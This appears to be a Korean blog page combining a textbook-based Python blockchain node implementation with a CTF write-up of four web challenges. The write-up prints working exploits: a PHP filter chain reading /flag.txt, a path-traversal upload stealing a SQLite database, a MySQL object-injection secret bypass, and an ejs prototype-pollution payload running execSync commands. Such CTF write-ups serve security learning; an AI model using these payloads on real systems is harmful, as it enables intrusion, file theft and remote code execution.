파이썬으로 공부하는 블록체인 책을 기반으로 구현하였다.

from urllib.parse import urlparse
from time import time

import requests
import hashlib
import json
import random

DIFFICULTY = 4

class Blockchain:
    def __init__(self):
        self.chain = []
        self.current_transactions = []
        self.nodes = set()

        # Create the genesis block
        self.new_block(previous_hash=1, proof=100)

    @staticmethod
    def hash(block):
        block_string = json.dumps(block, sort_keys=True).encode()
        return hashlib.sha256(block_string).hexdigest()
    
    @staticmethod
    def valid_proof(last_proof, proof):
        guess = f'{last_proof}{proof}'.encode()
        guess_hash = hashlib.sha256(guess).hexdigest()
        return guess_hash[:DIFFICULTY] == '0' * DIFFICULTY
    
    @property
    def last_block(self):
        return self.chain[-1]
    
    def pow(self, last_proof):
        proof = random.randint(0, 2**64)
        while self.valid_proof(last_proof, proof) is False:
            proof = random.randint(0, 2**64)
        return proof
    
    def new_transaction(self, sender, recipient, amount, time=time()):
        self.current_transactions.append({
            'sender': sender,
            'recipient': recipient,
            'amount': amount,
            'timestamp': time,
        })
        return self.last_block['index'] + 1
    
    def new_block(self, proof, previous_hash=None):
        block = {
            'index': len(self.chain) + 1,
            'timestamp': time(),
            'transactions': self.current_transactions,
            'nonce': proof,
            'previous_hash': previous_hash or self.hash(self.chain[-1]),
        }
        self.current_transactions = []
        self.chain.append(block)
        return block
    
    def valid_chain(self, chain):
        last_block = chain[0]
        current_index = 1
        while current_index < len(chain):
            block = chain[current_index]
            if block['previous_hash'] != self.hash(last_block):
                return False
            if not self.valid_proof(last_block['nonce'], block['nonce']):
                return False
            last_block = block
            current_index += 1
        return True
    
    def register_node(self, address):
        parsed_url = urlparse(address)
        self.nodes.add(parsed_url.netloc.replace("0.0.0.0", "localhost"))

    def resolve_conflicts(self):
        neighbours = self.nodes
        new_chain = None
        max_length = len(self.chain)
        for node in neighbours:
            node_url = f'http://{node}/chain'
            response = requests.get(node_url)
            if response.status_code == 200:
                length = response.json()['length']
                chain = response.json()['chain']
                if length > max_length and self.valid_chain(chain):
                    max_length = length
                    new_chain = chain
        if new_chain:
            self.chain = new_chain
            return True
        return False
if __package__ is None or __package__ == '':
    import sys
    from os import path
    sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))

    from one_node.base import Blockchain
    from util import is_port_in_use
else:
    from ..one_node.base import Blockchain
    from ..util import is_port_in_use
from flask import Flask, request, jsonify
from time import time

import requests
import json
import hashlib

blockchain = Blockchain()
my_ip = '0.0.0.0'
my_port = '5000'
node_identifier = f'node_{my_port}'
mine_owner = 'master'
mine_profit = 0.1

# 포트가 사용중이면 다음 포트로 변경
while is_port_in_use(int(my_port)):
    my_port = str(int(my_port) + 1)

app = Flask(__name__)

@app.route('/chain', methods=['GET'])
def full_chain():
    print("chain info requested!")
    response = {
        'chain': blockchain.chain,
        'length': len(blockchain.chain),
    }
    return jsonify(response), 200

@app.route('/transactions', methods=['GET'])
def get_transactions():
    response = {
        'transactions': blockchain.current_transactions,
    }
    return jsonify(response), 200

@app.route('/nodes', methods=['GET'])
def get_nodes():
    response = {
        'nodes': list(blockchain.nodes),
    }
    return jsonify(response), 200

@app.route('/nodes/register', methods=['POST'])
def register_nodes():
    values = request.get_json()  # json 형태로 보내면 노드가 저장됨
    print("register nodes !!! : ", values)
    
    registering_node = values.get('nodes').replace("0.0.0.0", "localhost")
    if registering_node is None:  # 요청된 node 값이 없다면!
        return "Error: Please supply a valid list of nodes", 400
    
    # 요청받은 노드가 이미 등록된 노드와 중복인지 검사
    if registering_node.split("//")[1] in blockchain.nodes:
        print("Node already registered")  # 이미 등록된 노드입니다.
        response = {
            'message': 'Already Registered Node',
            'total_nodes': list(blockchain.nodes),
        }
    else:
        # 내 노드 리스트에 추가
        blockchain.register_node(registering_node)
        # 이후 해당 노드에 내 정보 등록하기
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        data = {
            "nodes": 'http://' + my_ip + ':' + str(my_port)
        }
        print("MY NODE INFO ", 'http://' + my_ip + ':' + str(my_port))
        requests.post(registering_node + "/nodes/register", headers=headers, data=json.dumps(data))
        
        # 이후 주변 노드들에도 새로운 노드가 등장함을 전파
        for add_node in blockchain.nodes:
            if add_node != registering_node.split("//")[1]:
                print('add_node : ', add_node)
                # 노드 등록하기
                headers = {'Content-Type': 'application/json; charset=utf-8'}
                data = {
                    "nodes": registering_node
                }
                requests.post('http://' + add_node + "/nodes/register", headers=headers, data=json.dumps(data))
        
        response = {
            'message': 'New nodes have been added',
            'total_nodes': list(blockchain.nodes),
        }
    return jsonify(response), 201

@app.route('/transactions/new', methods=['POST'])
def new_transaction():
    values = request.get_json()
    print("transactions_new!!! : ", values)
    
    required = ['sender', 'recipient', 'amount']
    if not all(k in values for k in required):
        return 'missing values', 400
    
    timestamp = values['timestamp'] if 'timestamp' in values else time()
    last_timestamp = blockchain.current_transactions[-1]['timestamp'] if len(blockchain.current_transactions) > 0 else 0

    if timestamp == last_timestamp:
        return jsonify({'message': 'This transaction is already added'}), 200

    index = blockchain.new_transaction(values['sender'], values['recipient'], values['amount'], timestamp)
    response = {'message': f'Transaction will be added to Block {index}'}
    
    # 노드 연결을 위해 추가되는 부분
    # 본 노드에 받은 거래 내역 정보를 다른 노드들에 다같이 업데이트해 준다.
    for node in blockchain.nodes:
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        data = {
            "sender": values['sender'],
            "recipient": values['recipient'],
            "amount": values['amount'],
            "timestamp": timestamp,
            "type": "sharing"  # 전파이기에 sharing이라는 type이 꼭 필요
        }
        requests.post(f"http://{node}/transactions/new", headers=headers, data=json.dumps(data))
        print(f"share transaction to >> http://{node}")
    
    return jsonify(response), 201

@app.route('/mine', methods=['GET'])
def mine():
    print("MINING STARTED")
    last_block = blockchain.last_block
    last_proof = last_block['nonce']
    proof = blockchain.pow(last_proof)
    blockchain.new_transaction(
        sender=mine_owner,
        recipient=node_identifier,
        amount=mine_profit  # coinbase transaction
    )
    previous_hash = blockchain.hash(last_block)
    block = blockchain.new_block(proof, previous_hash)
    print("MINING FINISHED")
    ################### 노드 연결을 위해 추가되는 부분
    response = None
    for node in blockchain.nodes:  # nodes에 연결된 모든 노드에 작업 증명(PoW)이 완료되었음을 전파한다.
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        data = {
            'miner_node': 'http://' + my_ip + ':' + str(my_port),
            'new_nonce': blockchain.last_block['nonce']
        }
        alarm_res = requests.get("http://" + node + "/nodes/resolve", headers=headers, data=json.dumps(data))
        if "ERROR" not in alarm_res.text:  # 전파 받은 노드의 응답에 ERROR라는 이야기가 없으면(나의 PoW가 인정받으면)
            ## 정상 response
            response = {
                'message': 'new block completed',
                'index': block['index'],
                'transactions': block['transactions'],
                'nonce': block['nonce'],
                'previous_hash': block['previous_hash'],
            }
        else: # 전파받은 노드의 응답에 이상이 있음을 알린다면?
            ## 내 PoW가 이상이 있을 수 있기에 다시 PoW 진행!
            block = blockchain.new_block(proof, previous_hash)
    
    return jsonify(response), 200

## 타 노드에서 블록 생성 내용을 전파하였을 때 검증 작업을 진행한다.
@app.route('/nodes/resolve', methods=['GET'])
def resolve():
    requester_node_info = request.get_json()
    required = ['miner_node']  # 해당 데이터가 존재해야 함
    # 데이터가 없으면 에러를 띄움
    if not all(k in requester_node_info for k in required):
        return 'missing values', 400
    ## 그전에 우선 previous에서 바뀐 것이 있는지 점검하자!!
    my_previous_hash = blockchain.last_block['previous_hash']
    last_proof = blockchain.last_block['nonce']
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    miner_chain_info = requests.get(requester_node_info['miner_node'].replace("0.0.0.0", "localhost") + "/chain", headers=headers)
    print("다른노드에서 요청이 온 블록, 검증 시작")
    print("miner_chain_info : ", miner_chain_info.text)
    new_block_previous_hash = json.loads(miner_chain_info.text)['chain'][-2]['previous_hash']
    print("new_block_previous_hash : ", new_block_previous_hash)
    print("my_previous_hash : ", my_previous_hash)
    # 내 노드의 전 해시와 새로 만든 노드의 전 해시가 같을 때!!! >> 정상
    if my_previous_hash == new_block_previous_hash and \
            blockchain.valid_proof(last_proof, int(requester_node_info['new_nonce'])):
        # 정말 PoW의 조건을 만족시켰을까? 검증하기
        print("다른노드에서 요청이 온 블록, 검증결과 정상!!!!!!")
        replaced = blockchain.resolve_conflicts()  # 결과값 : True Flase / True 면 내 블록의 길이가 짧아 대체되어야 한다.
        # 체인 변경 알림 메시지
        if replaced:
            ## 내 체이이 깗아서 대체되어야 함
            print("REPLACED length :", len(blockchain.chain))
            response = {
                'message': 'Our chain was replaced >> ' + my_ip + ":" + my_port,
                'new_chain': blockchain.chain
            }
        else:
            response = {
                'message': 'Our chain is authoritative',
                'chain': blockchain.chain
            }
    # 아니면 무엇인가 과거 데이터가 바뀐 것이다!!
    else:
        print("다른노드에서 요청이 온 블록, 검증결과 이상발생!!!!!!!!")
        response = {
            'message': 'Our chain is authoritative >> ' + my_ip + ":" + my_port,
            'chain': blockchain.chain
        }
    return jsonify(response), 200

def register_node():
    if my_port == 5000:
        return
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    data = {
        "nodes": 'http://localhost:' + str(my_port)
    }
    requests.post("http://localhost:5000/nodes/register", headers=headers, data=json.dumps(data))
    print("register node to http://localhost:5000")

if __name__ == '__main__':
    app.run(host=my_ip, port=my_port)

하지만 이 블록체인 네트워크에는 문제가 있다.

새 블록을 생성할 때 이전 블록의 해쉬를 포함하지 않으므로 (이전 블록의 nonce만을 포함한다) 중간에 블록 내용이 바뀌어도 검증할 수 없다.

노드간의 통신도 불완전한 부분이 많으며, 트랜잭션시에 서명을 포함하지 않으므로 지갑 보유자가 생성한 트랜잭션이 맞는지도 검증할 수 없다.

이 부분에 대해서 추후 코드를 고쳐 보완해야겠다.

 

https://github.com/rmagur1203/blockchain-network/tree/main/python

 

728x90

1. Free Flag (Easy)

문제 코드는 간단하다.

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Flag</title>
</head>

<body>

    <?php
    function isRateLimited($limitTime = 1)
    {
        $ipAddress = $_SERVER['REMOTE_ADDR'];
        $filename = sys_get_temp_dir() . "/rate_limit_" . md5($ipAddress);
        $lastRequestTime = @file_get_contents($filename);

        if ($lastRequestTime !== false && (time() - $lastRequestTime) < $limitTime) {
            return true;
        }

        file_put_contents($filename, time());
        return false;
    }

    if (isset($_POST['file'])) {
        if (isRateLimited()) {
            die("Limited 1 req per second");
        }
        $file = $_POST['file'];
        if (substr(file_get_contents($file), 0, 5) !== "<?php" && substr(file_get_contents($file), 0, 5) !== "<html") # i will let you only read my source haha
        {
            die("catched");
        } else {
            echo file_get_contents($file);
        }
    }
    ?>
</body>

</html>

간단히 file_get_contents() 에 받은 인자를 넘겨주고 그 내용이 <?php 또는 <html로 시작하지 않으면 필터링을 하는 코드이다.

처음 접근은 file_get_contents를 3번 호출하므로 서버를 만들어 1~2번째 요청은 <html 을 반환하고, 세번째 요청은 file:///etc/passwd 로 Redirect 하게 하였으나, 작동하지 않았다.

게다가 문제 서버에선 외부로 요청을 보낼 수 없었다.

하지만 file_get_contents는 php 스키마를 사용하여 특정 작업을 수행할 수 있다. 예를 들어 php://filter/$filters/resource=file:///etc/passwd 이러한 URL을 만들면 /etc/passwd에서 파일을 가져온 뒤 처리하는데 여기에 넣을 수 있는 필터들을 응용하여 <?php 문자열을 앞에 붙여주면 풀 수 있다.

https://github.com/synacktiv/php_filter_chain_generator

 

GitHub - synacktiv/php_filter_chain_generator

Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.

github.com

이러한 코드를 생성해주는 코드가 깃헙에 있기 때문에 이러한 것을 이용하면 풀 수 있다.

유의할 점으로는 <?php 문자열과 파일의 내용을 base64로 만들고, 둘이 단순히 붙이기 때문에, <?php 문자열이나 <html 문자열은 입력 길이가 3으로 나누어 떨어지지 않기 때문에 임의의 글자 하나를 붙여줘야 제대로 출력된다.

 

익스플로잇 코드

더보기

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=file:///flag.txt2. Watermelon

 

2. Watermelon (Easy)

대회에 나온 웹해킹 문제중에 가장 쉬운 난이도를 갖고 있다.

전체 코드

더보기
from flask import Flask, request, jsonify, session, send_file
from functools import wraps
from flask_sqlalchemy import SQLAlchemy
import os, secrets
from werkzeug.utils import secure_filename



app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.db' 
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = secrets.token_hex(20)
app.config['UPLOAD_FOLDER'] = 'files'


db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password = db.Column(db.String(120), nullable=False)

class File(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    filename = db.Column(db.String(255), nullable=False)
    filepath = db.Column(db.String(255), nullable=False)
    uploaded_at = db.Column(db.DateTime, nullable=False, default=db.func.current_timestamp())
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)

    user = db.relationship('User', backref=db.backref('files', lazy=True))


def create_admin_user():
    admin_user = User.query.filter_by(username='admin').first()
    if not admin_user:
        admin_user = User(username='admin', password= secrets.token_hex(20))
        db.session.add(admin_user)
        db.session.commit()
        print("Admin user created.")
    else:
        print("Admin user already exists.")

with app.app_context():
    db.create_all()
    create_admin_user()

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'username' not in session or 'user_id' not in session:
            return jsonify({"Error": "Unauthorized access"}), 401
        return f(*args, **kwargs)
    return decorated_function


def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'username' not in session or 'user_id' not in session or not session['username']=='admin':
            return jsonify({"Error": "Unauthorized access"}), 401
        return f(*args, **kwargs)
    return decorated_function

@app.route('/')
def index():
    return 'Welcome to my file sharing API'

@app.post("/register")
def register():
    if not request.json or not "username" in request.json or not "password" in request.json:
        return jsonify({"Error": "Please fill all fields"}), 400
    
    username = request.json['username']
    password = request.json['password']

    if User.query.filter_by(username=username).first():
        return jsonify({"Error": "Username already exists"}), 409

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return jsonify({"Message": "User registered successfully"}), 201

@app.post("/login")
def login():
    if not request.json or not "username" in request.json or not "password" in request.json:
        return jsonify({"Error": "Please fill all fields"}), 400
    
    username = request.json['username']
    password = request.json['password']

    user = User.query.filter_by(username=username, password=password).first()
    if not user:
        return jsonify({"Error": "Invalid username or password"}), 401
    
    session['user_id'] = user.id
    session['username'] = user.username
    return jsonify({"Message": "Login successful"}), 200

@app.get('/profile')
@login_required
def profile():
    return jsonify({"username": session['username'], "user_id": session['user_id']})

@app.get('/files')
@login_required
def list_files():
    user_id = session.get('user_id')
    files = File.query.filter_by(user_id=user_id).all()
    file_list = [{"id": file.id, "filename": file.filename, "filepath": file.filepath, "uploaded_at": file.uploaded_at} for file in files]
    return jsonify({"files": file_list}), 200


@app.route("/upload", methods=["POST"])
@login_required
def upload_file():
    if 'file' not in request.files:
        return jsonify({"Error": "No file part"}), 400
    
    file = request.files['file']
    if file.filename == '':
        return jsonify({"Error": "No selected file"}), 400
    
    user_id = session.get('user_id')
    if file:
        blocked = ["proc", "self", "environ", "env"]
        filename = file.filename

        if filename in blocked:
            return jsonify({"Error":"Why?"})

        user_dir = os.path.join(app.config['UPLOAD_FOLDER'], str(user_id))
        os.makedirs(user_dir, exist_ok=True)
        

        file_path = os.path.join(user_dir, filename)

        file.save(f"{user_dir}/{secure_filename(filename)}")
        

        new_file = File(filename=secure_filename(filename), filepath=file_path, user_id=user_id)
        db.session.add(new_file)
        db.session.commit()
        
        return jsonify({"Message": "File uploaded successfully", "file_path": file_path}), 201

    return jsonify({"Error": "File upload failed"}), 500

@app.route("/file/<int:file_id>", methods=["GET"])
@login_required  
def view_file(file_id):
    user_id = session.get('user_id')
    file = File.query.filter_by(id=file_id, user_id=user_id).first()

    if file is None:
        return jsonify({"Error": "File not found or unauthorized access"}), 404
    
    try:
        return send_file(file.filepath, as_attachment=True)
    except Exception as e:
        return jsonify({"Error": str(e)}), 500


@app.get('/admin')
@admin_required
def admin():
    return os.getenv("FLAG","BHFlagY{testing_flag}")



if __name__ == '__main__':
    app.run(host='0.0.0.0')

일단 파일을 업로드 할 때에 파일을 저장하거나, 파일 이름을 저장할 때에는 secure_filename 함수를 통해 escape 하는데, 파일 경로를 저장할 때에는 escape 코드가 없다.

        file_path = os.path.join(user_dir, filename)

        file.save(f"{user_dir}/{secure_filename(filename)}")
        

        new_file = File(filename=secure_filename(filename), filepath=file_path, user_id=user_id)

이를 통해 원하는 경로에 있는 파일을 읽을 수 있다.

이제 플래그를 찾아야 하는데, 플래그가 포함된 파일은 모두 .dockerignore를 통해 제외되어 있다.

하지만 /admin 경로에 접근하면 플래그를 제공해준다. 이를 통해 admin 계정의 비밀번호를 얻으면 문제를 풀 수 있다.

데이터베이스를 sqlite를 쓰고 있고, 우리는 원하는 경로의 파일을 읽을 수 있기 때문에, 이를 통하여 sqlite db 파일을 읽을 수 있다.

유의할 점으로는 db가 같은 경로가 아니라 instance/db.db 경로에 저장되어 있고, 이는 도커를 직접 켜서 확인해 볼 수 있다.

sqlite 파일을 다운로드 했다면, db를 열고 어드민의 비밀번호를 확인하여 로그인하면 된다.

익스플로잇 코드

더보기
const formdata = new FormData();
formdata.append("file", fileInput.files[0], "../../../../../app/instance/db.db");

const requestOptions = {
  method: "POST",
  body: formdata,
  redirect: "follow"
};

fetch("http://a7fb0e77002823ad8b10d.playat.flagyard.com/upload", requestOptions)
  .then((response) => response.text())
  .then((result) => console.log(result))
  .catch((error) => console.error(error));

 

3. Notey (Medium)

전체 코드

더보기

database.js

const mysql = require('mysql');
const crypto=require('crypto');


const pool = mysql.createPool({
  host: '127.0.0.1',
  user: 'ctf',
  password: 'ctf123',
  database: 'CTF',
  waitForConnections: true,
  connectionLimit: 10,
  queueLimit: 0
});

// One liner to wait a second
async function wait() {
  await new Promise(r => setTimeout(r, 1000));
}

function insertAdminUserOnce(callback) {
  const checkUserQuery = 'SELECT COUNT(*) AS count FROM users WHERE username = ?';
  const insertUserQuery = 'INSERT INTO users (username, password) VALUES (?, ?)';
  const username = 'admin';
  const password = crypto.randomBytes(32).toString("hex");

  pool.query(checkUserQuery, [username], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }

    const userCount = results[0].count;

    if (userCount === 0) {
      pool.query(insertUserQuery, [username, password], (err, results) => {
        if (err) {
          console.error('Error executing query:', err);
          callback(err, null);
          return;
        }
        console.log(`Admin user inserted successfully with this passwored ${password}.`);
        callback(null, results);
      });
    } else {
      console.log('Admin user already exists. No insertion needed.');
      callback(null, null);
    }
  });
}

function insertAdminNoteOnce(callback) {
  const checkNoteQuery = 'SELECT COUNT(*) AS count FROM notes WHERE username = "admin"';
  const insertNoteQuery = 'INSERT INTO notes(username,note,secret)values(?,?,?)';
  const flag = process.env.DYN_FLAG || "placeholder";
  const secret = crypto.randomBytes(32).toString("hex");

  pool.query(checkNoteQuery, [], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }

    const NoteCount = results[0].count;

    if (NoteCount === 0) {
      pool.query(insertNoteQuery, ["admin", flag, secret], (err, results) => {
        if (err) {
          console.error('Error executing query:', err);
          callback(err, null);
          return;
        }
        console.log(`Admin Note inserted successfully with this secret ${secret}`);
        callback(null, results);
      });
    } else {
      console.log('Admin Note already exists. No insertion needed.');
      callback(null, null);
    }
  });
}


function login_user(username,password,callback){

  const query = 'Select * from users where username = ? and password = ?';
  
  pool.query(query, [username,password], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }
    callback(null, results);
  });
}

function register_user(username, password, callback) {
  const checkUserQuery = 'SELECT COUNT(*) AS count FROM users WHERE username = ?';
  const insertUserQuery = 'INSERT INTO users (username, password) VALUES (?, ?)';

  pool.query(checkUserQuery, [username], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }

    const userCount = results[0].count;

    if (userCount === 0) {
      pool.query(insertUserQuery, [username, password], (err, results) => {
        if (err) {
          console.error('Error executing query:', err);
          callback(err, null);
          return;
        }
        console.log('User registered successfully.');
        callback(null, results);
      });
    } else {
      console.log('Username already exists.');
      callback(null, null);
    }
  });
}


function getNotesByUsername(username, callback) {
  const query = 'SELECT note_id,username,note FROM notes WHERE username = ?';
  pool.query(query, [username], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }
    callback(null, results);
  });
}

function getNoteById(noteId, secret, callback) {
  const query = 'SELECT note_id,username,note FROM notes WHERE note_id = ? and secret = ?';
  console.log(noteId,secret);
  pool.query(query, [noteId,secret], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }
    callback(null, results);
  });
}

function addNote(username, content, secret, callback) {
  const query = 'Insert into notes(username,secret,note)values(?,?,?)';
  pool.query(query, [username, secret, content], (err, results) => {
    if (err) {
      console.error('Error executing query:', err);
      callback(err, null);
      return;
    }
    callback(null, results);
  });
}


module.exports = {
  getNotesByUsername, login_user, register_user, getNoteById, addNote, wait, insertAdminNoteOnce, insertAdminUserOnce
};

index.js

const express = require('express');
const bodyParser = require('body-parser');
const crypto=require('crypto');
var session = require('express-session');
const db = require('./database');
const middleware = require('./middlewares');

const app = express();


app.use(bodyParser.urlencoded({
extended: true
}))

app.use(session({
    secret: crypto.randomBytes(32).toString("hex"),
    resave: true,
    saveUninitialized: true
}));



app.get('/',(req,res)=>{
    res.send("Welcome")
})

app.get('/profile', middleware.auth, (req, res) => {
    const username = req.session.username;

    db.getNotesByUsername(username, (err, notes) => {
    if (err) {
        return res.status(500).json({ error: 'Internal Server Error' });
    }
    res.json(notes);
    });
});

app.get('/viewNote', middleware.auth, (req, res) => {
    const { note_id,note_secret } = req.query;

    if (note_id && note_secret){
        db.getNoteById(note_id, note_secret, (err, notes) => {
            if (err) {
            return res.status(500).json({ error: 'Internal Server Error' });
            }
            return res.json(notes);
        });
    }
    else
    {
        return res.status(400).json({"Error":"Missing required data"});
    }
});


app.post('/addNote', middleware.auth, middleware.addNote, (req, res) => {
    const { content, note_secret } = req.body;
        db.addNote(req.session.username, content, note_secret, (err, results) => {
            if (err) {
            return res.status(500).json({ error: 'Internal Server Error' });
            }
    
            if (results) {
            return res.json({ message: 'Note added successful' });
            } else {
            return res.status(409).json({ error: 'Something went wrong' });
            }
        });
});


app.post('/login', middleware.login, (req, res) => {
const { username, password } = req.body;

    db.login_user(username, password, (err, results) => {
        if (err) {
        console.log(err);
        return res.status(500).json({ error: 'Internal Server Error' });
        }

        if (results.length > 0) {
        req.session.username = username;
        return res.json({ message: 'Login successful' });
        } else {
        return res.status(401).json({ error: 'Invalid username or password' });
        }
    });
});

app.post('/register', middleware.login, (req, res) => {
const { username, password } = req.body;

    db.register_user(username, password, (err, results) => {
        if (err) {
        return res.status(500).json({ error: 'Internal Server Error' });
        }

        if (results) {
        return res.json({ message: 'Registration successful' });
        } else {
        return res.status(409).json({ error: 'Username already exists' });
        }
    });
});

db.wait().then(() => {
    db.insertAdminUserOnce((err, results) => {
        if (err) {
            console.error('Error:', err);
        } else {
            db.insertAdminNoteOnce((err, results) => {
                if (err) {
                    console.error('Error:', err);
                } else {
                    app.listen(3000, () => {
                        console.log('Server started on http://localhost:3000');
                    });
                }
            });
        }
    });
});

 middleware.js

const auth = (req, res, next) => {
    ssn = req.session
    if (ssn.username) {
        return next();
    } else {
        return res.status(401).send('Authentication required.');
    }
};


const login = (req,res,next) =>{
    const {username,password} = req.body;
    if ( !username || ! password )
    {
        return res.status(400).send("Please fill all fields");
    }
    else if(typeof username !== "string" || typeof password !== "string")
    {
        return res.status(400).send("Wrong data format");
    }
    next();
}

const addNote = (req,res,next) =>{
    const { content, note_secret } = req.body;
    if ( !content || ! note_secret )
    {
        return res.status(400).send("Please fill all fields");
    }
    else if(typeof content !== "string" || typeof note_secret !== "string")
    {
        return res.status(400).send("Wrong data format");
    }
    else if( !(content.length > 0 && content.length < 255) ||  !( note_secret.length >=8 && note_secret.length < 255) )
    {
        return res.status(400).send("Wrong data length");
    }
    next();
}

module.exports ={
    auth, login, addNote
};

이 서버에 있는 취약점은, addNote 경로에 대해선 addNote 미들웨어를 통해 파라미터가 string인지 검사하였지만, viewNote에 대해선 검사하지 않아서 쿼리에 원하는 데이터를 넣을 수 있다.

플래그를 얻기 위해서는 서버가 실행될 때 생성되는 어드민 노트를 봐야 한다. 이 노트는 secret이 랜덤이기 때문에,

위 취약점을 이용하여 secret을 우회하여 플래그가 적힌 노트를 읽어야 한다.

app.get("/viewNote", middleware.auth, (req, res) => {
  const { note_id, note_secret } = req.query;

  if (note_id && note_secret) {
    db.getNoteById(note_id, note_secret, (err, notes) => {
      if (err) {
        return res.status(500).json({ error: "Internal Server Error" });
      }
      return res.json(notes);
    });
  } else {
    return res.status(400).json({ Error: "Missing required data" });
  }
});

function getNoteById(noteId, secret, callback) {
  const query =
    "SELECT note_id,username,note FROM notes WHERE note_id = ? and secret = ?";
  console.log(noteId, secret);
  pool.query(query, [noteId, secret], (err, results) => {
    if (err) {
      console.error("Error executing query:", err);
      callback(err, null);
      return;
    }
    callback(null, results);
  });
}

note_secret에 배열이나 객체를 넣게 되면,

배열

SELECT note_id,username,note FROM notes WHERE note_id = '66' and secret = '1', '2'

객체

SELECT note_id,username,note FROM notes WHERE note_id = '66' and secret = `a` = '1'

이런식으로 해석이 된다. 이를 통하여 키를 secret으로 하고 값을 1로 하게 되면

SELECT note_id,username,note FROM notes WHERE note_id = '66' and secret = `secret` = '1'

이런식으로 우회할 수 있어 관리자의 노트를 볼 수 있다.

관리자의 노트 id는 AUTO_INCREMENT=66 을 통해 66임을 알거나, 직접 노트를 하나 추가해봐서 알 수 있다.

4. Fastest Delivery Service (Hard)

공격은 프로토타입을 통해 ejs 3.1.9까지 있던 취약점을 이용하여 푸는 문제이다.

코드가 많아 주요 코드만 보여주자면

app.post('/address', (req, res) => {
    const { user } = req.session;
    const { addressId, Fulladdress } = req.body;

    if (user && users[user.username]) {
        addresses[user.username][addressId] = Fulladdress;
        users[user.username].address = addressId;
        res.redirect('/login');
    } else {
        res.redirect('/register');
    }
});

로그인 후 주소를 지정할 때 프로토타입 오염을 수행할 수 있으며,

{
    "name": "food-delivery-service",
    "version": "1.0.0",
    "description": "",
    "main": "app.js",
    "scripts": {
      "start": "node app.js"
    },
    "dependencies": {
      "express": "^4.18.2",
      "body-parser": "^1.20.1",
      "ejs":"^3.1.9",
      "express-session":"^1.18.0"
    }
  }

ejs 버전이 ^3.1.9로 되어 있지만, 도커 파일에서 npm ci를 통해 package-lock.json에 있는 패키지 내용대로 설치하므로,

3.1.10버전이 아닌, package-lock.json에 있는 ejs 버전인 3.1.9로 설치된다.

function Template(text, opts) {
  opts = opts || utils.createNullProtoObjWherePossible();
  ...
 }
 
 Template.prototype = {
  ...
  compile: function () {
    ...
    if (opts.client) {
      src = 'escapeFn = escapeFn || ' + escapeFn.toString() + ';' + '\n' + src;
      if (opts.compileDebug) {
        src = 'rethrow = rethrow || ' + rethrow.toString() + ';' + '\n' + src;
      }
    }
    ...
  }
  ...
}

ejs.js 에 있는 이 코드를 통하여 공격이 가능하다. escapeFn은 별다른 검증 없이 직접 코드에 추가해주며, 이를 위해선 선행 조건으로 opts.client가 truthy value이여야 한다.

프로토타입 공격을 통하여 client: 1, escapeFn: payload 이렇게 설정해주면 바로 공격을 실행할 수 있다.

페이로드

더보기
import requests

host = "http://afa7e436bad357d78723e.playat.flagyard.com"

session = requests.Session()
r = session.post(f'{host}/register', data={
    'username': '__proto__',
    'password': 'asdf',
});

r = session.post(f'{host}/address', data={
    'username': '__proto__',
    'addressId': 'client',
    'Fulladdress': '1',
})

r = session.post(f'{host}/address', data={
    'username': '__proto__',
    'addressId': 'escapeFunction',
    'Fulladdress': '1; throw new Error(process.mainModule.require("child_process").execSync(`cat /tmp/flag*`).toString())',
})
print(r.text)

 

728x90

기호 참고 : https://jeo96.tistory.com/entry/%EC%88%98%ED%95%99-%ED%91%9C%EA%B8%B0

 
